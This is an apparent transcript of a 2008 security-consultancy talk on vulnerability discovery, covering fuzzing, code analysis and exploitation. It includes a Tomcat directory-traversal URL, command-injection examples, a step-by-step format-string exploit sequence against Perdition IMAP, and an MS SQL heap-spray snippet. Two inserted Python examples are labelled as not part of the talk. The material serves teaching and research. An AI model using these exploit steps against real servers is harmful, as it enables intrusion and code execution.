Page 1: Why software always breaks: From phone lines to … (itsecx.fhstp.ac.at/includes/archiv_2008/unterlagen/...)

Why software always breaks: From phone lines to CPU threads

2008

Version: 1.0
Author: Bernhard Müller
Responsible: Bernhard Müller
Date: 31.10.2008
Confidentiality: Public

Page 2:

About SEC Consult

• Leading information security advisor in Europe

• Sample customers (most customers are subject to NDA):

• Some vulnerabilities found by SEC Consult:

○ MS05-037 (Internet Explorer JVIEW profiler vulnerability)

○ CVE-2005-3591 (Macromedia Flash Player memory dereference)

○ MS06-029 (MS Outlook Web Access script injection)

○ CVE-2006-6690 (Typo3 shell command injection)

○ CVE-2007-0450 (Apache Tomcat Directory Traversal)

• Regular talks at Blackhat and other security conferences

• More information at http://www.sec-consult.com/publikationen

© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved

Page 3:

Purpose about this talk

• Show you that most vulnerabilities in IT systems are essentially the same

• Fast-forward tour on vulnerability discovery and exploitation

• Give you some links and tools for your own research

Agenda

• „In band control“ vulnerabilities overview

• Input fuzzing

• Code- and binary analysis

• Exploitation and some examples

Page 4:

What do we mean by „in band control“

• Very broad definition: If user input is or can be mixed with control data (intentionally or unintentionally)

• When we can manipulate control data with our input, we can almost always hijack the control flow

[Diagram: internal logic and data processing; attacker input overlaps control data („attacker ownage“); outcome: return, exit, crash, or whatever]

Page 5:

Why is this possible

• Intentionally, often „security by obscurity“, or nobody thought about the security implications

• Examples:

• Phone phreaking

○ Phone line: Data channel = control channel


• ARP Spoofing

○ Ethernet: Data channel = control channel

• Arbitrary object instantiation

○ Also „obfuscated“ parameter passing in serialized Java objects,…

○ Nowadays, often seen in Enterprise web applications

Page 6:

Why is this possible

• Unintentionally (for numerous reasons)

• Programming errors

• Missing input validation

    char buf[256];
    strcpy(buf, userinput);

    exec("sendmail " + $recipient + " < email.txt")

• Incomplete input validation

• Client side input validation

http://tomcat:8080/context/\../manager/html
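The request above only gets through because the component that validates the path and the component that resolves it disagree about what a path separator is. As an added illustration (not code from the talk), the Python below models that mismatch on constructed sample paths and shows the canonicalise-then-check fix; CONTEXT, the helper names and the back-end model are assumptions.

```python
import posixpath

# Constructed for this example (not from the talk): a web context root and a
# model of a back end that, like the one behind the slide's example URL, treats
# '\' as a path separator while the front-end check only knows '/'.
CONTEXT = "/context/"


def naive_is_inside_context(path: str) -> bool:
    """Front-end style check: normalise '/'-separated components, then require
    the result to stay under the context root. A '\\..' component is not '..'
    to posixpath, so it survives normalisation and the check passes."""
    return posixpath.normpath(path).startswith(CONTEXT)


def backend_resolves(path: str) -> str:
    """Assumed back-end behaviour: fold '\\' into '/' first, then normalise.
    The same request therefore resolves to a different resource than the
    one the front end believed it had checked."""
    return posixpath.normpath(path.replace("\\", "/"))


def hardened_is_inside_context(path: str) -> bool:
    """Canonicalise with the back end's own rules before the containment
    check, so validator and consumer agree on what the path means."""
    canonical = backend_resolves(path)
    return canonical == CONTEXT.rstrip("/") or canonical.startswith(CONTEXT)


def classify(path: str) -> dict:
    """What each layer makes of one request, for side-by-side inspection."""
    return {
        "naive_allows": naive_is_inside_context(path),
        "backend_resolves_to": backend_resolves(path),
        "hardened_allows": hardened_is_inside_context(path),
    }


if __name__ == "__main__":
    for p in ("/context/index.jsp",
              "/context/../manager/html",
              "/context/\\../manager/html"):   # the slide's request
        print(p, classify(p))
```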

Page 7:

Testing for vulnerabilities: Input Fuzzing (1)

• Simple method

○ Identify the interface and expected input

○ Try lots of inputs (mutated, random)

• Automated tools are available

○ Generic protocol fuzzers

○ Web application scanners

○ Etc.

• Custom tools

○ Use perl, python, etc. (something efficient!)

○ Can be based on existing fuzzing frameworks: Scapy (kind of), Peach, Sulley

• Manual testing

○ Especially useful for web applications

• Pros: Simple, fast and efficient

• Cons: Limited coverage

Page 8:

Testing for vulnerabilities: Input Fuzzing (2)

• Examples:

○ Very simple „fuzzing“ on the command-line

DEMO

○ More complex example: Fuzzing MS SQL extended server stored procedures

1. Look up all existing stored procedures (don't rely on documentation alone)

2. Find out which parameters are processed

3. Write everything down in a format that your fuzzing script will be able to read

4. Create fuzzing script (e.g. based on Sulley)

5. Run script (use some existing framework to monitor results)

6. Check and verify results
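The six steps above reduced to a runnable sketch: this is an added example, not the talk's demo or Sulley code. It fuzzes a constructed toy LOGIN parser (standing in for the strcpy example earlier) with mutated inputs, monitors for crashes and keeps the shortest reproducer per crash type; the parser, its buffer sizes and the token dictionary are assumptions.

```python
import random

# Constructed toy target for this example (not code from the talk): an
# IMAP-style LOGIN parser that copies fields into fixed-size "buffers",
# standing in for the strcpy(buf, userinput) pattern shown earlier.
TAG_BUF, FIELD_BUF = 16, 64

class BufferOverflowError(Exception):
    """Simulated memory corruption: a field longer than its buffer."""

def parse_login(line: str) -> dict:
    parts = line.split(" ")
    if len(parts) != 4 or parts[1].upper() != "LOGIN":
        return {"status": "BAD"}          # graceful rejection, not a crash
    tag, _, user, password = parts
    for value, limit in ((tag, TAG_BUF), (user, FIELD_BUF), (password, FIELD_BUF)):
        if len(value) > limit:
            raise BufferOverflowError(f"{len(value)} bytes into a {limit}-byte buffer")
    return {"status": "OK", "tag": tag, "user": user}

# Tokens worth injecting into any text protocol (the in-band control theme):
# format identifiers, separators, traversal sequences, quotes, NUL.
DICTIONARY = ["%n", "%s", "%08x", "\\../", "../", "'", ";", "\x00", " ", "%"]

def mutate(seed: str, rng: random.Random) -> str:
    """Apply one random mutation to a known-good sample input."""
    pos = rng.randrange(len(seed) + 1)
    choice = rng.randrange(5)
    if choice == 0:                       # overwrite one byte
        return seed[:pos] + chr(rng.randrange(1, 256)) + seed[pos + 1:]
    if choice == 1:                       # insert a dictionary token
        return seed[:pos] + rng.choice(DICTIONARY) + seed[pos:]
    if choice == 2:                       # insert a long run (length probe)
        return seed[:pos] + "A" * rng.choice([64, 256, 1024, 4096]) + seed[pos:]
    if choice == 3:                       # delete one byte
        return seed[:pos] + seed[pos + 1:]
    return seed + seed                    # duplicate the whole input

def fuzz(target, seeds, iterations: int, seed_value: int = 1) -> dict:
    """Steps 5 and 6 of the procedure: run mutated inputs, record each
    distinct exception type, and keep the shortest input that triggered it
    so the result can be verified by hand afterwards."""
    rng = random.Random(seed_value)       # fixed seed: reproducible runs
    crashes = {}
    for _ in range(iterations):
        sample = mutate(rng.choice(seeds), rng)
        try:
            target(sample)
        except Exception as exc:          # any crash-like deviation counts
            key = type(exc).__name__
            if key not in crashes or len(sample) < len(crashes[key]):
                crashes[key] = sample
    return crashes
```

Calling fuzz(parse_login, ["a001 LOGIN alice secret"], 3000) with the fixed seed reports a BufferOverflowError together with its shortest reproducer, which is what the verification step then confirms by hand.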

Page 9:

Testing for vulnerabilities: Input Fuzzing (3)

• Rule of thumb: Create any (im)possible input

• This is what we want to see:

• … or any other deviation from normal behaviour…

Page 10:

Testing for vulnerabilities: Input Fuzzing (4)

• Monitoring results: Sulley web interface

Page 11:

Testing: In-depth application-/protocol analysis (1)

• Automatic code analysis: Code Scanning

○ Free tools: rats,…

○ Custom tools: Perl, Python, grep,…

○ Commercial Tools: Fortify SCA, Ounce,…

• Manual code analysis or binary analysis:

○ Text editor (read the source), Eclipse

○ Disassembler (binary analysis): IDA Pro, OllyDBG

• Reverse Engineering

○ e.g. network protocol: proxy, network sniffer,…

Page 12:

Testing: In-depth application-/protocol analysis (2)

• Our former example (someformparser.cgi):

• Normally, it's not that easy ☺

• Multiple ways of vulnerability analysis:

○ Search for vulnerable functions and see if they are reached by user input

○ Trace all user input and look if it reaches vulnerable code

○ Do a complete, line by line audit, and cover the whole application

• A very complex topic obviously, we will cover that another time…

Page 13:

Exploitation (1)

• Problem: How do we decide if the condition is exploitable?

• Best way is a quick manual analysis (often based on experience)

• If the application / protocol is fundamentally flawed, no amount of external validation and protection can help it

○ (Web-)application firewalls can be bypassed

○ Runtime validation can be bypassed (PHP MAGIC_QUOTES etc.)

○ Compiler measures can be bypassed (ASLR, Stack canaries,…)

○ Intrusion prevention systems can be bypassed

○ Most other things that someone invented can be bypassed (some are even ridiculous)

• Often, a very limited injection can be exploited

○ One byte memory write

○ PHP file inclusion on a packet filtered and web firewalled system with most or all PHP safeguards activated

• See examples on the next pages

○ These are for binary applications, but the same principles apply to everything

Page 14:

Exploitation (2)

• Perdition IMAP Server: Limited format string vulnerability (2007)

○ One format identifier can be injected

○ Can't do things like „%.16705u%hn“

○ Random stack etc. doesn't make it any easier

    static const char *__str_vwrite(io_t * io, const flag_t flag,
                                    const size_t nargs, const char *fmt, va_list ap,
                                    int *bytes)
    {
    (...)
        fmt_args = 0;
        for (place = 0; fmt[place] != '\0'; place++) {
            if (fmt[place] == '%')
                fmt[place + 1] == '%' ? place++ : fmt_args++;
        }
        if (fmt_args != nargs) {
    (...)
            VANESSA_LOGGER_DEBUG_UNSAFE("nargs and fmt mismatch: "
                                        "%d args requested, %d args in format",
                                        nargs, fmt_args);
            return (NULL);
        }

        *bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap);

Page 15:

Exploitation (3)

• Perdition IMAP Server: Limited format string vulnerability (2007)

○ Can be exploited by controlling program flow

1. read stack layout (to bypass ASLR)

2. put shellcode and .got address on the stack

3. overwrite .got entry for strncasecmp byte-by-byte (value is controlled by string length)

4. trigger call to strncasecmp

[Diagram: Login() and Authenticate() handlers; .got entry for strncasecmp at 0x08065370; read and write steps as listed below]

1. %13$08x -> Get shellcode address

2. LOL LOGIN \x70\x53\x06\x08 (+Shellcode) -> Setup Stack

3. LOL LOGIN AAA..AAA%.hn -> Write b1

4. LOL LOGIN AAA..AAA%.hn -> Write b2

5. LOL LOGIN AAA..AAA%.hn -> Write b3

6. LOL LOGIN AAA..AAA%.hn -> Write b4

7. LOL AUTHENTICATE X X -> Trigger call to strncasecmp()

OWNED!

Page 16:

Exploitation (4)

• MS SQL Server 2000: Limited memory overwrite (0day)

○ SQL server crashes due to input validation error

○ Details will be published when a patch is out

○ A single address can be overwritten with limited values

○ Practically, we can only overwrite one DWORD with values between 0x0 and 0x1B58

○ But that's enough, at least in Windows 2000

Page 17:

Exploitation (5)

• MS SQL Server 2000: Limited memory overwrite (0day)

1. Spray the heap with NOPs & shellcode

    SET @shell = @resPEB + (...)


    SET @counter = 0
    WHILE @counter < 7000
    BEGIN
        SET @counter = @counter + 1
        SET @sh000 = @sh000 + CHAR(144)
        SET @sh001 = @sh001 + CHAR(144)
        (….)
    END
    SET @sh000 = @sh000 + @shell
    SET @sh001 = @sh001 + @shell
    (...)

Page 18:

Exploitation (6)

• MS SQL Server 2000: Limited memory overwrite (0day)

2. Overwrite MSW of FastPEBLockRoutine pointer (has to be restored by the shellcode!)

1. 0x7ffdf020: 3c 31 88 77 6d 31 88 77

2. 0x7ffdf020: 3c 31 97 19 00 00 88 77

[Diagram: FastPEBLockRoutine pointer, original value 0x7788313c, overwritten to 0x1997313c, which points into the heap filled with NOPs & shellcode]

Page 19:

The End

• References

○ “Internet Exploiter” by Skylined (first use of heap spraying): http://www.edup.tudelft.nl/~bjwever/

○ Perdition IMAP Proxy Format String Vulnerability (full advisory): http://www.sec-consult.com/files/20071031_perdition-imapd-fmtstr.txt

• Further reading

○ M. Sutton, A. Greene, and P. Amini, “Fuzzing: Brute Force Vulnerability Discovery”, Addison-Wesley, 2007

○ Greg Hoglund and Gary McGraw, “Exploiting Software: How to Break Code”, Addison-Wesley, 2004

○ Security Mailing lists: http://seclists.org/bugtraq/ and http://seclists.org/fulldisclosure/

Page 20:

The End

• Recommended toolbox:

○ BURP Proxy (for testing web applications): http://portswigger.net/proxy/

○ Scapy (for fuzzing network protocols): http://www.secdev.org/projects/scapy/

○ Sulley fuzzing framework: http://www.fuzzing.org/fuzzing-software

○ IDA Pro (good disassembler): http://www.datarescue.com/

○ OllyDBG (good debugger): http://www.ollydbg.de/

○ Metasploit (awesome shellcode generator): http://www.metasploit.com/

○ Eclipse (for reading sourcecode): http://www.eclipse.org/

○ Perl (for quick tools): http://www.perl.org/

○ Python (for more complex tasks): http://www.python.org/

○ MS Visual Studio: http://msdn.microsoft.com/en-us/vstudio/default.aspx

Page 21:

About SEC Consult

SEC Consult Unternehmensberatung GmbH

Mooslackengasse 17,

A-1190 Wien


Tel: +43 / 1 8903043 0

Fax: +43 / 1 8903043 15

Email: [email protected]

http://www.sec-consult.com